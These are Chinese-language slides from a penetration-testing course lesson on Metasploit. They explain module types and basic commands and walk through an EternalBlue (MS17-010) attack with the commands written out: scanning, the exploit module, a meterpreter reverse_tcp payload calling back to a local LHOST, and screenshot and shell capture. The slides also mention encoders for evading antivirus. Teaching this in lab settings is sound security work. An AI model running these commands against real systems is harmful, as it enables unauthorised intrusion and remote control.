第十課msf-漏洞利用

1、 掌控安全 - Web安全微專業(yè)講師：阿蠻講師：阿蠻從Kali入門到玩轉(zhuǎn)黑客滲透工具 掌控安全學(xué)院小白的自我修養(yǎng) 一、戰(zhàn)前準(zhǔn)備#環(huán)境的安裝及配置二、信息收集#外網(wǎng)入口點(diǎn)探測(cè)三、前端滲透#弱點(diǎn)擊破四、漏洞利用與提權(quán)工具五、神兵利器#MSF 等待開課等待其他同學(xué)入場(chǎng)（8.25-8.35） 8.35準(zhǔn)時(shí)開講！歡迎聯(lián)系班主任微信：zkaqbanzhuren領(lǐng)取之前的課程回放 還有更多福利、活動(dòng)及新課程的開課通知微信公眾號(hào)：掌控安全EDU今日課程：MSF-漏洞利用我的 微信號(hào)：zkaqbanzhurenMSF-基本模塊Auxiliary 輔助模塊 為滲透測(cè)試信息搜集提供了大量的輔助模塊支持Exploit

2、s攻擊模塊 利用發(fā)現(xiàn)的安全漏洞或配置弱點(diǎn)對(duì)遠(yuǎn)程目標(biāo)系統(tǒng) 進(jìn)行攻擊，從而獲得對(duì)遠(yuǎn)程目標(biāo)系統(tǒng)訪問(wèn)權(quán)的代碼組件。Payload攻擊載荷模塊 攻擊成功后促使靶機(jī)運(yùn)行的一段植入代碼Post后滲透攻擊模塊 收集更多信息或進(jìn)一步訪問(wèn)被利用的目標(biāo)系統(tǒng)Encoders 編碼模塊 將攻擊載荷進(jìn)行編碼，來(lái)繞過(guò)防護(hù)軟件攔截MSF所用功能可分為這幾個(gè)模塊，每個(gè)模塊都有各自的功能領(lǐng)域MSF-基礎(chǔ)指令簡(jiǎn)單好用的幫助指令help/? 幫助菜單exit退出msfBack 返回info顯示一個(gè)或者多個(gè)模塊的信息show顯示所給類型的模塊background 將當(dāng)前操作在后臺(tái)運(yùn)行use 選擇使用模塊sessions 查看會(huì)話msf

3、的套路掃描靶機(jī) msf use auxiliary/scanner/smb/smb_ms17_010選擇exploituse exploit/windows/smb/ms17_010_eternalblue選擇payloadset payload windows/x64/meterpreter/reverse_tcp攻擊 run/exploit掃描靶機(jī)msf use auxiliary/scanner/smb/smb_ms17_010Required欄為yes，則Current Setting欄內(nèi)的值需要進(jìn)行設(shè)置 【+】表示有此漏洞選擇exploitmsf auxiliary(scanner/

4、smb/smb_ms17_010) use exploit/windows/smb/ms17_010_eternalblue模塊的基本設(shè)置options 顯示選項(xiàng)required 欄為yes ,則 current setting欄不能為空通常在exploit模塊中，我們需要設(shè)置靶機(jī)的地址，即RHOSTset RHOST 靶機(jī)地址查看payloads查看：show payloads設(shè)置payloadmsf exploit(windows/smb/ms17_010_eternalblue) set payload windows/x64/meterpreter/reverse_tcp模塊的基本設(shè)置通常在payload模塊中，我們需要設(shè)置本機(jī)的地址，即LHOSTset LHOST 192.168.139.137shell獲取屏幕截圖：meterpreterscreenshot獲取shell：meterpretersh